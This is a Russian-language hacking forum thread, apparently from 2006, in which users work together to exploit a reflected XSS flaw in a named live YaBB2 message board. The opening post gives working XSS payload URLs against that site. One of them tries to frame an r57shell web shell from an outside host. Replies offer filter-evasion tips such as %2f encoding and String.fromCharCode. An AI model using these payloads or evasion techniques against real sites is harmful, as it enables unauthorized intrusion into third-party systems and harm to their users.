XSS на Yabb2 Rc1

Discussion in 'Уязвимости' started by $n@ke, 10 Dec 2006.

  1. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Первый раз такое, аж обидно!))но здаватся не собираюсь!

    _http://board.chatrol.ru/cgi-bin/yabb2/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Djavascript:alert('XSS-Vulnerability')><%252FIFRAME>

    вот КСС, подставляю вместо "javascript" src, прописую путь к 57шеллу на народе
    PHP:
    http://board.chatrol.ru/cgi-bin/yabb2/YaBB.pl?action=usersrecentposts;username=<IFRAME%20SRC%3Dhttp://XAK.narod.ru/r57shell.php><%252FIFRAME>
    , но вылезает эррор, типа :
    Символ / не может использовацца в логине!Я уж и кодировал строку, и все равно никак!
    Кто то может подскажет чтонить?
     
    2 people like this.
  2. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    / > %2f
     
  3. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    На народе нельзя, он php не поддерживает.
     
    1 person likes this.
  4. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    У него полюбому бы тогда код бы шелла высветелся, а народ, да пхп для него было бы шикарно! :)
     
  5. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    2 jah
    нет, %2f не катит!Я ж грю.!
    ну да, код бы должен был показацца!
     
  6. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    $n@ke, попробуй через String.fromCharCode - может получится... Понять о чем это можно здесь https://forum.antichat.ru/thread15709.html
     
    1 person likes this.